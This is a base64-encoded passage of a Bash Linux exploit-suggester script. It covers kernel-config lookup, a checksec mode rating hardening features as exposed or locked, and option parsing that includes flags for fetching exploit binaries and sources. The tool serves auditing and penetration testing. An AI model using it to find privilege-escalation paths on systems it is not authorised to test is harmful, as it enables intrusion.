C1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBjbWQ9IiR7SU46NH0iCiAgICAgICAgaWYgZXZhbCAiJHtjbWR9IjsgdGhlbgogICAgICAgICAgICByZXR1cm4gMAogICAgICAgIGZpCiAgICBmaQoKICAgIHJldHVybiAxCn0KCmdldEtlcm5lbENvbmZpZygpIHsKCiAgICBpZiBbIC1mIC9wcm9jL2NvbmZpZy5neiBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9InpjYXQgL3Byb2MvY29uZmlnLmd6IgogICAgZWxpZiBbIC1mIC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0IC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIgogICAgZWxpZiBbIC1mICIke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fSIvLmNvbmZpZyBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9ImNhdCAke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fS8uY29uZmlnIgogICAgZWxzZQogICAgICAgIEtDT05GSUc9IiIKICAgIGZpCn0KCmNoZWNrc2VjTW9kZSgpIHsKCiAgICBNT0RFPTAKCiAgICAjIHN0YXJ0IGFuYWx5c2lzCmZvciBGRUFUVVJFIGluICIke0ZFQVRVUkVTW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRkVBVFVSRSIKCgkjIG1vZGVzOiBrZXJuZWwtZmVhdHVyZSAoMSkgfCBody1mZWF0dXJlICgyKSB8IDNyZHBhcnR5LWZlYXR1cmUgKDMpIHwgYXR0YWNrLXN1cmZhY2UgKDQpCiAgICBOQU1FPSIke2FyclswXX0iCiAgICBQUkVfTkFNRT0iJHtOQU1FOjA6OH0iCiAgICBOQU1FPSIke05BTUU6OX0iCiAgICBpZiBbICIke1BSRV9OQU1FfSIgPSAic2VjdGlvbjoiIF07IHRoZW4KCQkjIGFkdmFuY2UgdG8gbmV4dCBNT0RFCgkJTU9ERT0kKCgkTU9ERSArIDEpKQoKICAgICAgICBlY2hvCiAgICAgICAgZWNobyAtZSAiJHtibGR3aHR9JHtOQU1FfSR7dHh0cnN0fSIKICAgICAgICBlY2hvCiAgICAgICAgY29udGludWUKICAgIGZpCgogICAgQVZBSUxBQkxFPSIke2FyclsxXX0iICYmIEFWQUlMQUJMRT0iJHtBVkFJTEFCTEU6MTF9IgogICAgRU5BQkxFPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZW5hYmxlZDogIiB8IGF3ayAtRidlZDogJyAne3ByaW50ICQyfScpCiAgICBhbmFseXNpc191cmw9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJhbmFseXNpcy11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGF2YWlsYWJpbGl0eSByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGF2YWlsYWJpbGl0eSByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEFWQUlMQUJMRSIKICAgIEFWQUlMQUJMRV9SRVFTX05VTT0keyNhcnJheVtAXX0KICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPTAKCUNPTkZJRz0iIgogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwoKCQkjIGZpbmQgQ09ORklHXyBuYW1lIChpZiBwcmVzZW50KSBmb3IgY3VycmVudCBmZWF0dXJlIChvbmx5IGZvciBkaXNwbGF5IHB1cnBvc2VzKQoJCWlmIFsgLXogIiRDT05GSUciIF07IHRoZW4KCQkJY29uZmlnPSQoZWNobyAiJFJFUSIgfCBncmVwICJDT05GSUdfIikKCQkJWyAtbiAiJGNvbmZpZyIgXSAmJiBDT05GSUc9IigkKGVjaG8gJFJFUSB8IGN1dCAtZCc9JyAtZjEpKSIKCQlmaQoKICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpOyB0aGVuCiAgICAgICAgICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPSQoKCRBVkFJTEFCTEVfUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGVuYWJsZW1lbnQgcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCBlbmFibGVtZW50IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBFTkFCTEVfUEFTU0VEX1JFUT0wCiAgICBFTkFCTEVfUkVRU19OVU09MAogICAgbm9TeXNjdGw9MAogICAgaWYgWyAtbiAiJEVOQUJMRSIgXTsgdGhlbgogICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRFTkFCTEUiCiAgICAgICAgRU5BQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgY21kU3Rkb3V0PSQoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpCiAgICAgICAgICAgIHJldFZhbD0kPwogICAgICAgICAgICBpZiBbICRyZXRWYWwgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICAgICAgRU5BQkxFX1BBU1NFRF9SRVE9JCgoJEVOQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgICAgIGVsaWYgWyAkcmV0VmFsIC1lcSAyIF07IHRoZW4KICAgICAgICAgICAgIyBzcGVjaWFsIGNhc2U6IHN5c2N0bCBlbnRyeSBpcyBub3QgcHJlc2VudCBvbiBnaXZlbiBzeXN0ZW06IHNpZ25hbCBpdCBhczogTi9BCiAgICAgICAgICAgICAgICBub1N5c2N0bD0xCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQogICAgICAgIGRvbmUKICAgIGZpCgogICAgZmVhdHVyZT0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImZlYXR1cmU6ICIgfCBjdXQgLWQnICcgLWYgMi0pCgoJaWYgWyAtbiAiJGNtZFN0ZG91dCIgXTsgdGhlbgogICAgICAgIGlmIFsgIiRjbWRTdGRvdXQiIC1lcSAwIF07IHRoZW4KICAgICAgICAgICAgc3RhdGU9IlsgJHt0eHRyZWR9U2V0IHRvICRjbWRTdGRvdXQke3R4dHJzdH0gXSIKCQkJY21kU3Rkb3V0PSIiCiAgICAgICAgZWxzZQogICAgICAgICAgICBzdGF0ZT0iWyAke3R4dGdybn1TZXQgdG8gJGNtZFN0ZG91dCR7dHh0cnN0fSBdIgoJCQljbWRTdGRvdXQ9IiIKICAgICAgICBmaQogICAgZWxzZQoKCXVua25vd249IlsgJHt0eHRncmF5fVVua25vd24ke3R4dHJzdH0gIF0iCgoJIyBmb3IgM3JkIHBhcnR5ICgzKSBtb2RlIGRpc3BsYXkgIk4vQSIgb3IgIkVuYWJsZWQiCglpZiBbICRNT0RFIC1lcSAzIF07IHRoZW4KICAgICAgICBlbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gICBdIgogICAgICAgIGRpc2FibGVkPSJbICAgJHt0eHRncmF5fU4vQSR7dHh0cnN0fSAgICBdIgoKICAgICMgZm9yIGF0dGFjay1zdXJmYWNlICg0KSBtb2RlIGRpc3BsYXkgIkxvY2tlZCIgb3IgIkV4cG9zZWQiCiAgICBlbGlmIFsgJE1PREUgLWVxIDQgXTsgdGhlbgogICAgICAgZW5hYmxlZD0iWyAke3R4dHJlZH1FeHBvc2VkJHt0eHRyc3R9ICBdIgogICAgICAgZGlzYWJsZWQ9IlsgJHt0eHRncm59TG9ja2VkJHt0eHRyc3R9ICAgXSIKCgkjb3RoZXIgbW9kZXMiICJEaXNhYmxlZCIgLyAiRW5hYmxlZCIKCWVsc2UKCQllbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gIF0iCgkJZGlzYWJsZWQ9IlsgJHt0eHRyZWR9RGlzYWJsZWQke3R4dHJzdH0gXSIKCWZpCgoJaWYgWyAteiAiJEtDT05GSUciIC1hICIkRU5BQkxFX1JFUVNfTlVNIiA9IDAgXTsgdGhlbgoJICAgIHN0YXRlPSR1bmtub3duCiAgICBlbGlmIFsgJEFWQUlMQUJMRV9QQVNTRURfUkVRIC1lcSAkQVZBSUxBQkxFX1JFUVNfTlVNIC1hICRFTkFCTEVfUEFTU0VEX1JFUSAtZXEgJEVOQUJMRV9SRVFTX05VTSBdOyB0aGVuCiAgICAgICAgc3RhdGU9JGVuYWJsZWQKICAgIGVsc2UKICAgICAgICBzdGF0ZT0kZGlzYWJsZWQKCWZpCgogICAgZmkKCiAgICBlY2hvIC1lICIgJHN0YXRlICRmZWF0dXJlICR7d2h0fSR7Q09ORklHfSR7dHh0cnN0fSIKICAgIFsgLW4gIiRhbmFseXNpc191cmwiIF0gJiYgZWNobyAtZSAiICAgICAgICAgICAgICAkYW5hbHlzaXNfdXJsIgogICAgZWNobwoKZG9uZQoKfQoKZGlzcGxheUV4cG9zdXJlKCkgewogICAgUkFOSz0kMQoKICAgIGlmIFsgIiRSQU5LIiAtZ2UgNiBdOyB0aGVuCiAgICAgICAgZWNobyAiaGlnaGx5IHByb2JhYmxlIgogICAgZWxpZiBbICIkUkFOSyIgLWdlIDMgXTsgdGhlbgogICAgICAgIGVjaG8gInByb2JhYmxlIgogICAgZWxzZQogICAgICAgIGVjaG8gImxlc3MgcHJvYmFibGUiCiAgICBmaQp9CgojIHBhcnNlIGNvbW1hbmQgbGluZSBwYXJhbWV0ZXJzCkFSR1M9JChnZXRvcHQgLS1vcHRpb25zICRTSE9SVE9QVFMgIC0tbG9uZ29wdGlvbnMgJExPTkdPUFRTIC0tICIkQCIpClsgJD8gIT0gMCBdICYmIGV4aXRXaXRoRXJyTXNnICJBYm9ydGluZy4iCgpldmFsIHNldCAtLSAiJEFSR1MiCgp3aGlsZSB0cnVlOyBkbwogICAgY2FzZSAiJDEiIGluCiAgICAgICAgLXV8LS11bmFtZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgVU5BTUVfQT0iJDEiCiAgICAgICAgICAgIG9wdF91bmFtZV9zdHJpbmc9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1WfC0tdmVyc2lvbikKICAgICAgICAgICAgdmVyc2lvbgogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtaHwtLWhlbHApCiAgICAgICAgICAgIHVzYWdlIAogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtZnwtLWZ1bGwpCiAgICAgICAgICAgIG9wdF9mdWxsPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtZ3wtLXNob3J0KQogICAgICAgICAgICBvcHRfc3VtbWFyeT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWJ8LS1mZXRjaC1iaW5hcmllcykKICAgICAgICAgICAgb3B0X2ZldGNoX2JpbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1zfC0tZmV0Y2gtc291cmNlcykKICAgICAgICAgICAgb3B0X2ZldGNoX3NyY3M9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1rfC0ta2VybmVsKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBLRVJORUw9IiQxIgogICAgICAgICAgICBvcHRfa2VybmVsX3ZlcnNpb249dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1kfC0tc2hvdy1kb3MpCiAgICAgICAgICAgIG9wdF9zaG93X2Rvcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXB8LS1wa2dsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIFBLR0xJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9wa2dsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY3ZlbGlzdC1maWxlKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBDVkVMSVNUX0ZJTEU9IiQxIgogICAgICAgICAgICBvcHRfY3ZlbGlzdF9maWxlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWNoZWNrc2VjKQogICAgICAgICAgICBvcHRfY2hlY2tzZWNfbW9kZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1rZXJuZWxzcGFjZS1vbmx5KQogICAgICAgICAgICBvcHRfa2VybmVsX29ubHk9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tdXNlcnNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF91c2Vyc3BhY2Vfb25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgICAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLXBrZy12ZXJzaW9ucykKICAgICAgICAgICAgb3B0X3NraXBfcGtnX3ZlcnNpb25zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAqKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBpZiBbICIkIyIgIT0gIjAiIF07IHRoZW4KICAgICAgICAgICAgICAgIGV4aXRXaXRoRXJyTXNnICJVbmtub3duIG9wdGlvbiAnJDEnLiBBYm9ydGluZy4iCiAgICAgICAgICAgIGZpCiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIDs7CiAgICBlc2FjCiAgICBzaGlmdApkb25lCgojIGNoZWNrIEJhc2ggdmVyc2lvbiAoYXNzb2NpYXRpdmUgYXJyYXlzIG5lZWQgQmFzaCBpbiB2ZXJzaW9uIDQuMCspCmlmICgoQkFTSF9WRVJTSU5GT1swXSA8IDQpKTsgdGhlbgogICAgZXhpdFdpdGhFcnJNc2cgIlNjcmlwdCBuZWVkcyBCYXNoIGluIHZlcnNpb24gNC4wIG9yIG5ld2VyLiBBYm9ydGluZy4iCmZpCgojIGV4aXQgaWYgYm90aCAtLWtlcm5lbCBhbmQgLS11bmFtZSBhcmUgc2V0ClsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgWyAkb3B0X3VuYW1lX3N0cmluZyA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAta3wtLWtlcm5lbCBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCgojIGV4aXQgaWYgYm90aCAtLWZ1bGwgYW5kIC0tc2hvcnQgYXJlIHNldApbICIkb3B0X2Z1bGwiID0gInRydWUiIF0gJiYgWyAkb3B0X3N1bW1hcnkgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWZ8LS1mdWxsIGFuZCAtZ3wtLXNob3J0IGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgLS1jdmVsaXN0LWZpbGUgbW9kZSBpcyBzdGFuZGFsb25lIG1vZGUgYW5kIGlzIG5vdCBhcHBsaWNhYmxlIHdoZW4gb25lIG9mIC1rIHwgLXUgfCAtcCB8IC0tY2hlY2tzZWMgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAhIC1lICIkQ1ZFTElTVF9GSUxFIiBdICYmIGV4aXRXaXRoRXJyTXNnICJQcm92aWRlZCBDVkUgbGlzdCBmaWxlIGRvZXMgbm90IGV4aXN0cy4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWN2ZWxpc3QtZmlsZSBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLXB8LS1wa2dsaXN0LWZpbGUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgLS1jaGVja3NlYyBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jdmVsaXN0LWZpbGUgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2NoZWNrc2VjX21vZGUiID0gInRydWUiIF07IHRoZW4KICAgIFsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1rfC0ta2VybmVsIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jaGVja3NlYyBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCmZpCgojIGV4dHJhY3Qga2VybmVsIHZlcnNpb24gYW5kIG90aGVyIE9TIGluZm8gbGlrZSBkaXN0cm8gbmFtZSwgZGlzdHJvIHZlcnNpb24sIGV0Yy4gMyBwb3NzaWJpbGl0aWVzIGhlcmU6CiMgY2FzZSAxOiAtLWtlcm5lbCBzZXQKaWYgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPT0gInRydWUiIF07IHRoZW4KICAgICMgVE9ETzogYWRkIGtlcm5lbCB2ZXJzaW9uIG51bWJlciB2YWxpZGF0aW9uCiAgICBbIC16ICIkS0VSTkVMIiBdICYmIGV4aXRXaXRoRXJyTXNnICJVbnJlY29nbml6ZWQga2VybmVsIHZlcnNpb24gZ2l2ZW4uIEFib3J0aW5nLiIKICAgIEFSQ0g9IiIKICAgIE9TPSIiCgogICAgIyBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyBvbiBjdXJyZW50IG1hY2hpbmUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKCiAgICAjIGRvIG5vdCBjb25zaWRlciBjdXJyZW50IE9TCiAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKIyBjYXNlIDI6IC0tdW5hbWUgc2V0CmVsaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiBdOyB0aGVuCiAgICBbIC16ICIkVU5BTUVfQSIgXSAmJiBleGl0V2l0aEVyck1zZyAidW5hbWUgc3RyaW5nIGVtcHR5LiBBYm9ydGluZy4iCiAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMzogLS1jdmVsaXN0LWZpbGUgbW9kZQplbGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKIyBjYXNlIDQ6IC0tY2hlY2tzZWMgbW9kZQplbGlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICMgdGhpcyBzd2l0Y2ggaXMgbm90IGFwcGxpY2FibGUgaW4gdGhpcyBtb2RlCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz1mYWxzZQoKICAgICMgZ2V0IGtlcm5lbCBjb25maWd1cmF0aW9uIGluIHRoaXMgbW9kZQogICAgZ2V0S2VybmVsQ29uZmlnCiAgICBbIC16ICIkS0NPTkZJRyIgXSAmJiBlY2hvICJXQVJOSU5HLiBLZXJuZWwgQ29uZmlnIG5vdCBmb3VuZCBvbiB0aGUgc3lzdGVtIHJlc3VsdHMgd29uJ3QgYmUgY29tcGxldGUuIgoKICAgICMgbGF1bmNoIGNoZWNrc2VjIG1vZGUKICAgIGNoZWNrc2VjTW9kZQoKICAgIGV4aXQgMAoKIyBjYXNlIDU6IG5vIC0tdW5hbWUgfCAtLWtlcm5lbCB8IC0tY3ZlbGlzdC1maWxlIHwgLS1jaGVja3NlYyBzZXQKZWxzZQoKICAgICMgLS1wa2dsaXN0LWZpbGUgTk9UIHByb3ZpZGVkOiB0YWtlIGFsbCBpbmZvIGZyb20gY3VycmVudCBtYWNoaW5lCiAgICAjIGNhc2UgZm9yIHZhbmlsbGEgZXhlY3V0aW9uOiAuL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoCiAgICBpZiBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPT0gImZhbHNlIiBdOyB0aGVuCiAgICAgICAgVU5BTUVfQT0kKHVuYW1lIC1hKQogICAgICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgICAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAgICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJmYWxzZSIgXSAmJiBnZXRLZXJuZWxDb25maWcKCiAgICAgICAgIyBleHRyYWN0IGRpc3RyaWJ1dGlvbiB2ZXJzaW9uIGZyb20gL2V0Yy9vcy1yZWxlYXNlIE9SIC9ldGMvbHNiLXJlbGVhc2UKICAgICAgICBbIC1uICIkT1MiIC1hICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIERJU1RSTz0kKGdyZXAgLXMgLUUgJ15ESVNUUklCX1JFTEVBU0U9fF5WRVJTSU9OX0lEPScgL2V0Yy8qLXJlbGVhc2UgfCBjdXQgLWQnPScgLWYyIHwgaGVhZCAtMSB8IHRyIC1kICciJykKCiAgICAgICAgIyBleHRyYWN0IHBhY2thZ2UgbGlzdGluZyBmcm9tIGN1cnJlbnQgT1MKICAgICAgICBnZXRQa2dMaXN0ICIkT1MiICIiCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBwcm92aWRlZDogb25seSBjb25zaWRlciB1c2Vyc3BhY2UgZXhwbG9pdHMgYWdhaW5zdCBwcm92aWRlZCBwYWNrYWdlIGxpc3RpbmcKICAgIGVsc2UKICAgICAgICBLRVJORUw9IiIKICAgICAgICAjVE9ETzogZXh0cmFjdCBtYWNoaW5lIGFyY2ggZnJvbSBwYWNrYWdlIGxpc3RpbmcKICAgICAgICBBUkNIPSIiCiAgICAgICAgdW5zZXQgRVhQTE9JVFMKICAgICAgICBkZWNsYXJlIC1BIEVYUExPSVRTCiAgICAgICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiAgICAgICAgIyBhZGRpdGlvbmFsIGNoZWNrcyBhcmUgbm90IGFwcGxpY2FibGUgZm9yIHRoaXMgbW9kZQogICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgIGZpCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fUF2YWlsYWJsZSBpbmZvcm1hdGlvbjoke3R4dHJzdH0iCmVjaG8KWyAtbiAiJEtFUk5FTCIgXSAmJiBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRncm59JEtFUk5FTCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiS2VybmVsIHZlcnNpb246ICR7dHh0cmVkfU4vQSR7dHh0cnN0fSIKZWNobyAiQXJjaGl0ZWN0dXJlOiAkKFsgLW4gIiRBUkNIIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRBUkNIJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKZWNobyAiRGlzdHJpYnV0aW9uOiAkKFsgLW4gIiRPUyIgXSAmJiBlY2hvIC1lICIke3R4dGdybn0kT1Mke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvIC1lICJEaXN0cmlidXRpb24gdmVyc2lvbjogJChbIC1uICIkRElTVFJPIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRESVNUUk8ke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKZWNobyAiQWRkaXRpb25hbCBjaGVja3MgKENPTkZJR18qLCBzeXNjdGwgZW50cmllcywgY3VzdG9tIEJhc2ggY29tbWFuZHMpOiAkKFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPT0gImZhbHNlIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufXBlcmZvcm1lZCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgppZiBbIC1uICIkUEtHTElTVF9GSUxFIiAtYSAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59JFBLR0xJU1RfRklMRSR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHTElTVF9GSUxFIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRyZWR9dW5yZWNvZ25pemVkIGZpbGUgcHJvdmlkZWQke3R4dHJzdH0iCmVsaWYgWyAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59ZnJvbSBjdXJyZW50IE9TJHt0eHRyc3R9IgpmaQoKZWNobyAtZSAiUGFja2FnZSBsaXN0aW5nOiAkKFsgLW4gIiRwa2dMaXN0RmlsZSIgXSAmJiBlY2hvIC1lICIkcGtnTGlzdEZpbGUiIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKIyBoYW5kbGUgLS1rZXJuZWxzcGFjeS1vbmx5ICYgLS11c2Vyc3BhY2Utb25seSBmaWx0ZXIgb3B0aW9ucwppZiBbICIkb3B0X2tlcm5lbF9vbmx5IiA9ICJ0cnVlIiAtbyAteiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUU19VU0VSU1BBQ0UKICAgIGRlY2xhcmUgLUEgRVhQTE9JVFNfVVNFUlNQQUNFCmZpCgppZiBbICIkb3B0X3VzZXJzcGFjZV9vbmx5IiA9ICJ0cnVlIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUUwogICAgZGVjbGFyZSAtQSBFWFBMT0lUUwpmaQoKZWNobwplY2hvIC1lICIke2JsZHdodH1TZWFyY2hpbmcgYW1vbmc6JHt0eHRyc3R9IgplY2hvCmVjaG8gIiR7I0VYUExPSVRTW0BdfSBrZXJuZWwgc3BhY2UgZXhwbG9pdHMiCmVjaG8gIiR7I0VYUExPSVRTX1VTRVJTUEFDRVtAXX0gdXNlciBzc